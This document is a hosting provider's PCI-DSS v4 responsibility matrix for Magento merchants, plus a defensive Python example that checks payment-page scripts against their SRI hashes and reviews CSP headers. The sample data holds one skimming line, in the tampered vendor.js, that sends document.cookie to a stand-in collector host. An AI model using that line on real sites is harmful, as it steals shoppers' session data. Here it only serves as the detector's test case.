PCI-DSS SAQ & Responsibility Matrix
PCI compliance is the merchant's responsibility. Some questions in your SAQ relate to infrastructure or server configuration; the table below shows, for each block of requirements, who is responsible for the control and the answer you can give.
Physical Architecture

SAQ Answers (Updated for v4)
Requirements | Responsible party | Response | Condition |
---|---|---|---|
1.1.1 - 1.5.1 | Sonassi | Yes | |
2.1.1 - 2.2.7 | Sonassi | Yes | |
2.3.1 - 2.3.2 | Sonassi | N/A | |
3.1.1 - 3.7.9 | You | Yes / N/A | Yes if you store cardholder data (for example via Magento Payment Bridge or a third-party storage provider). N/A if no cardholder data is stored in your environment |
4.1.1 - 4.2.2 | You | Yes / No | Yes if cardholder data is only ever transmitted over HTTPS. No if any cardholder data is transmitted over plain HTTP |
5.1.1 - 5.4.1 | Sonassi | Yes | |
6.1.1 - 6.1.2 | Sonassi | Yes | |
6.2.1 - 6.2.4 | You | This depends on your own development practice | |
6.3.1 - 6.3.3 | Both | Sonassi is responsible for patching the operating system and services. You are responsible for patching any software you install, such as Magento or Node. | |
6.4.1 - 6.5.1 | You | This depends on your own development practice | |
6.5.2 - 6.5.2 | Sonassi | Yes | |
6.5.3 | You | Yes | If your pre-production (staging) stores are kept in separate domain groups from your production stores |
6.5.4 - 6.5.6 | You | This depends on your own development practice | |
7.1.1 - 7.3.3 | Both | Sonassi manages access to the stack platform, whereas you manage access to your Magento store and any other CMS platforms (e.g. WordPress) | |
8.1.1 - 8.6.3 | Both | Yes | Provided you comply with the conditions that apply to you |
9.1.1 - 9.3.9 | Sonassi | Yes | |
9.4.7 - 9.5.1.3 | You | This depends on your own cardholder data processing practice | |
10.1.1 - 10.4.3 | Sonassi | Yes | |
10.5.1 - 10.5.1 | Sonassi | Yes | If using our long term log storage facility |
10.6.1 - 10.7.3 | Sonassi | Yes | |
11.1.1 - 11.1.2 | Sonassi | Yes | |
11.2.1 - 11.2.2 | Sonassi | N/A | |
11.3.1 - 11.4.6 | Sonassi | Yes | |
11.4.7 - 11.4.7 | Sonassi | N/A | |
11.5.1 - 11.5.1.1 | Sonassi | Yes | Per our standard firewall policy |
11.5.2 - 11.5.2 | Sonassi | Yes | Per our vulnerability scanner and our audit log notifier |
11.6.1 | You | Yes | Magento's Content Security Policy (CSP) and Subresource Integrity (SRI) configuration covers tamper detection for payment-page scripts. Third-party services such as Threatview also cover this |
12.1.1 - 12.8.1 | Both | Yes | Yes for the controls Sonassi operates; the remainder depends on your own security policies and programme |
12.8.2 - 12.9.2 | You | This depends on your own cardholder data storage practice | |
12.10.1 - 12.10.7 | Both | Yes | Depends on your own incident response plan |
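Requirement 11.6.1 asks for a mechanism that detects unauthorised changes to the scripts and security-relevant HTTP headers of the payment page as received by the consumer browser. The row above notes that Magento's CSP and SRI configuration covers this; the script below is an added, stand-alone example (not Magento's, Sonassi's or Threatview's code) of what that check looks like when run from the monitoring side: it verifies the `integrity` attribute of every external script against the bytes actually served, flags scripts with no SRI at all, and reviews the `Content-Security-Policy` header for settings that would let an injected script run. The page HTML, script bodies and CSP headers are constructed sample data, and `fetch_constructed` stands in for an HTTP client (both are assumptions, not anything from a real store).

```python
"""Payment-page tamper checks: SRI verification plus a CSP sanity review (added example)."""
import base64
import hashlib
from html.parser import HTMLParser

ALLOWED_SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the SRI token for content, e.g. 'sha384-<base64 digest>'."""
    if algo not in ALLOWED_SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


class _ScriptCollector(HTMLParser):
    """Collects the attributes of every <script src=...> tag on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            attributes = {name: (value or "") for name, value in attrs}
            if attributes.get("src"):
                self.scripts.append(attributes)


def verify_sri(html: str, fetch) -> list[tuple[str, str]]:
    """Check each external script. fetch(url) returns the bytes currently served for url.
    Status per script: 'ok', 'missing-integrity', 'bad-integrity-format' or 'mismatch'."""
    collector = _ScriptCollector()
    collector.feed(html)
    results = []
    for attrs in collector.scripts:
        src = attrs["src"]
        integrity = attrs.get("integrity", "").strip()
        if not integrity:
            results.append((src, "missing-integrity"))  # browser cannot enforce anything
            continue
        served = fetch(src)
        matched, valid_tokens = False, 0
        for token in integrity.split():
            token = token.split("?")[0]  # drop any option suffix the spec allows
            algo, _, digest = token.partition("-")
            if algo not in ALLOWED_SRI_ALGOS or not digest:
                continue
            valid_tokens += 1
            if sri_hash(served, algo) == token:
                matched = True
        if valid_tokens == 0:
            results.append((src, "bad-integrity-format"))
        else:
            results.append((src, "ok" if matched else "mismatch"))
    return results


def check_csp(header: str) -> list[str]:
    """Flag CSP settings that would let an injected script execute on the payment page."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    findings = []
    if sources is None:
        return ["no script-src or default-src directive: scripts from any origin are allowed"]
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    # With a nonce or hash present, browsers ignore 'unsafe-inline', so only flag it otherwise.
    if "'unsafe-inline'" in sources and not has_nonce_or_hash:
        findings.append("script-src allows 'unsafe-inline' without nonce/hash: injected inline scripts run")
    if "*" in sources:
        findings.append("script-src contains '*': scripts may be loaded from any origin")
    if "'unsafe-eval'" in sources:
        findings.append("script-src allows 'unsafe-eval'")
    return findings


# --- constructed sample data (assumption: not taken from any real store) ---
CHECKOUT_JS = b"window.checkout = {token: null};"
VENDOR_JS = b"window.vendor = {};"
# The served copy of vendor.js differs from what the page's SRI hash was computed over.
SERVED = {
    "/static/checkout.js": CHECKOUT_JS,
    "/static/vendor.js": VENDOR_JS + b"fetch('https://collector.example/?c=' + document.cookie);",
    "/static/analytics.js": b"track();",
}
PAYMENT_PAGE = f"""<html><body>
<script src="/static/checkout.js" integrity="{sri_hash(CHECKOUT_JS)}" crossorigin="anonymous"></script>
<script src="/static/vendor.js" integrity="{sri_hash(VENDOR_JS, 'sha256')}" crossorigin="anonymous"></script>
<script src="/static/analytics.js"></script>
</body></html>"""
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' *"
STRONG_CSP = "default-src 'self'; script-src 'self' 'nonce-abc123'"


def fetch_constructed(url: str) -> bytes:
    """Stand-in for an HTTP client: returns the constructed 'served' bytes for url."""
    return SERVED[url]


if __name__ == "__main__":
    for src, status in verify_sri(PAYMENT_PAGE, fetch_constructed):
        print(f"{status:18} {src}")
    for finding in check_csp(WEAK_CSP):
        print("CSP:", finding)
```

In practice the `fetch` argument would be a real HTTP client that retrieves the live payment page and each script as a consumer browser would, and the check would run on a schedule so that a `mismatch` or `missing-integrity` result, or a weakened CSP header, raises an alert. SRI in the browser only blocks a tampered script for that one visitor; the monitoring run is what turns the same hash comparison into the detection evidence 11.6.1 asks for.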